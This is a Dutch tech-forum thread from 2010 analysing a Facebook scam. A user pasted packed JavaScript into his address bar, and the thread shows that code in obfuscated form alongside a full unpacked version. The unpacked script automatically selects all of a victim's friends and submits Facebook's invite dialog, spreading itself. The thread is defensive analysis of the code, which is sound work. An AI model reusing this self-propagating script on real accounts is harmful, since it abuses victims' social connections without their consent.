Check alle échte Black Friday-deals Ook zo moe van nepaanbiedingen? Wij laten alleen échte deals zien
Toon posts:

Vreemd javascript op Facebook

Pagina: 1
Acties:

dinsdag 18 mei 2010 23:34

Acties:
  • hupie679
  • Registratie: Januari 2005
  • Laatst online: 16:22

hupie679

Topicstarter
Zojuist kreeg ik een berichtje van mijn neefje op Facebook. De titel was I bet you would say ""WTF"" after Seeing This PIC! =0, dus ik was nog niet 100% van vertrouwen. Uiteindelijk toch maar verder geklikt en het zorgde er uiteindelijk voor dat ik via een paar stappen de volgende javascript in mijn adresbalk uitvoerde:

code:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55

javascript:(function()

{a='app126876133995467_jop';

b='app126876133995467_jode';

ifc='app126876133995467_ifc';

ifo='app126876133995467_ifo';

mw='app126876133995467_mwrapper';eval(function(p,a,c,k,e,r)

{e=function(c){return(c<a?'':e(parseInt

(c/a)))+((c=c%a)>35?String.fromChar

Code(c+29):c.toString(36))};if(!''.replace(/^/,String))

{while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function()

{return'\\w+'};c=1};while(c--)if(k[c])p=p.rep

lace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}

('J e=["\\n\\g\\j\\g\\F\\g\\i\\g\\h\\A","\\j\\h\\A\\i\\f","\\o\\f\\

h\\q\\i\\f\\r\\f\\k\\h\\K\\A\\L\\t","\\w\\g\\t\\t\\f\\k","\\g\\k\\k\\f\\x\\M\\N\\G\\O","\\n\\l\\i\\y\\f","\\j\\y\\o\\o\\f\\

j\\h","\\i\\g\\H\\f\\r\\f","\\G\\u\\y\\j\\f\\q\\n\\f\\k\\h\\j","\\p\\x\\f\\l\\h\\f\\q

\\n\\f\\k\\h","\\p\\i\\g\\p\\H","\\g\\k\\g\\h\\q\\n\\f\\k\\h","\\t\\g\\j\\z\\l\\h\\p\\w\\q\\n\\f\\k\\h","\\j\\f\\i\\f\\p\\h\\

v\\l\\i\\i","\\j\\o\\r\\v\\g\\k\\n\\g\\h\\f\\v\\P\\u\\x\\r","\\B\\l\\Q\\l\\R\\B\\j\\u\\

p\\g\\l\\i\\v\\o\\x\\l\\z\\w\\B\\g\\k\\n\\g\\h\\f\\v\\t\\g\\l\\i\\u\\o\\S\\z\\w\\z","\\j\\y\\F\\r\\g\\h\\T\\g\\l\\i\\u\\o"];d=U;d[e[2]]

(V)[e[1]][e[0]]=e[3];d[e[2]](a)[e[4]]=d[e[2]](b)

[e[5]];s=d[e[2]](e[6]);m=d[e[2]](e[7]);c=d[e[9]]

(e[8]);c[e[11]](e[10],I,I);s[e[12]](c);C(D(){W[e[13]]()},E);

C(D(){X[e[16]](e[14],e[15])},E);C(D(){m[e[12]]

(c);d[e[2]](Y)[e[4]]=d[e[2]](Z)[e[5]]},E);',62,69,'||||||||||||||_0x95ea|

x65|x69|x74|x6C|x73|x6E|x61||x76|x67|x63|x45|x6D||x64|

x6F|x5F|x68|x72|x75|x70|x79|x2F|setTimeout|function|5000|

x62|x4D|x6B|true|var|x42|x49|x48|x54|x4C|x66|x6A|x78|x2E|x44|docu

ment|mw|fs|SocialGraph

Manager|ifo|ifc|||||||'.split('|'),0,{}))})();


Hierna kreeg ik al mijn vrienden te zien, en werd dit bericht doorgestuurd naar hun allemaal.
Kan een van jullie zien of deze code hierboven kwaadaardig is? Komt dit bekend voor op Facebook?
Bij voorbaat dank,

https://github.com/hubertjanhickinson/OrconWifiController/

woensdag 19 mei 2010 00:12

Acties:
  • niels88
  • Registratie: April 2003
  • Niet online

niels88

So there you have it. There were two levels of obfuscation (I don't know the official terminology) but basically this is a stupid app that, when you paste the javascript into the address bar, it calls this SocialGraphManager app invitation screen, selects all of your friends by dispatching a "click" event to each friend in the list, and then submits the dialog box. Done. All of your friends have now been invited to this app (or recommended, whatever).
http://davezor.posterous....the-newest-facebook-invit

woensdag 19 mei 2010 00:13

Acties:
  • spone
  • Registratie: Mei 2002
  • Niet online

spone

Packed javascripts zijn meestal geen goed teken, zeker niet als het op zo'n overduidelijke manier aan je gepresenteerd wordt. Aan de code te zien heeft de maker aardig z'n best gedaan om het zo onleesbaar mogelijk te maken.

i5-14600K | 32GB DDR5-6000 | RTX 5070 - MacBook Pro M1 Pro 14" 16/512

woensdag 19 mei 2010 00:31

Acties:
  • crisp
  • Registratie: Februari 2000
  • Laatst online: 15:44

crisp

Devver

Pixelated

Unpacked:
JavaScript:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34

a='app126876133995467_jop';
b='app126876133995467_jode';
ifc='app126876133995467_ifc';
ifo='app126876133995467_ifo';
mw='app126876133995467_mwrapper'
document.getElementById(mw).style.visibility="hidden";
document.getElementById(a).innerHTML=document.getElementById(b).value;
s=document.getElementById("suggest");
m=document.getElementById("likeme");
c=document.createEvent("MouseEvents");
c.initEvent("click",true,true);
s.dispatchEvent(c);
setTimeout(
    function()
    {
        fs.select_all()
    },
    5000
);
setTimeout(
    function()
    {
        SocialGraphManager.submitDialog("sgm_invite_form", "/ajax/social_graph/invite_dialog.php")
    },
    5000
);
setTimeout(
    function()
    {
        m.dispatchEvent(c);
        document.getElementById(ifo).innerHTML=document.getElementById(ifc).value
    },
    5000
);

[ Voor 10% gewijzigd door crisp op 19-05-2010 00:36 ]

Intentionally left blank

woensdag 19 mei 2010 08:41

Acties:
  • hupie679
  • Registratie: Januari 2005
  • Laatst online: 16:22

hupie679

Topicstarter
Dus als ik het goed begrijp is het niet schadelijk.
Ik heb daarna meteen mijn vrienden een bericht gestuurd (kon trouwens niet allemaal tegelijk :( ) met daarin een waarschuwing.
Maar sommige mensen hebben al gereageerd met de melding dat ze niks hebben ontvangen.
Bedankt voor de hulp!

https://github.com/hubertjanhickinson/OrconWifiController/

Reageer

Apple iPhone 17 LG OLED evo G5 Google Pixel 10 Samsung Galaxy S25 Star Wars: Outlaws Nintendo Switch 2 Apple AirPods Pro (2e generatie) Sony PlayStation 5 Pro

Tweakers is onderdeel van DPG Media B.V.
Alle rechten voorbehouden - Auteursrecht © 1998 - 2025 Hosting door TrueFullstaq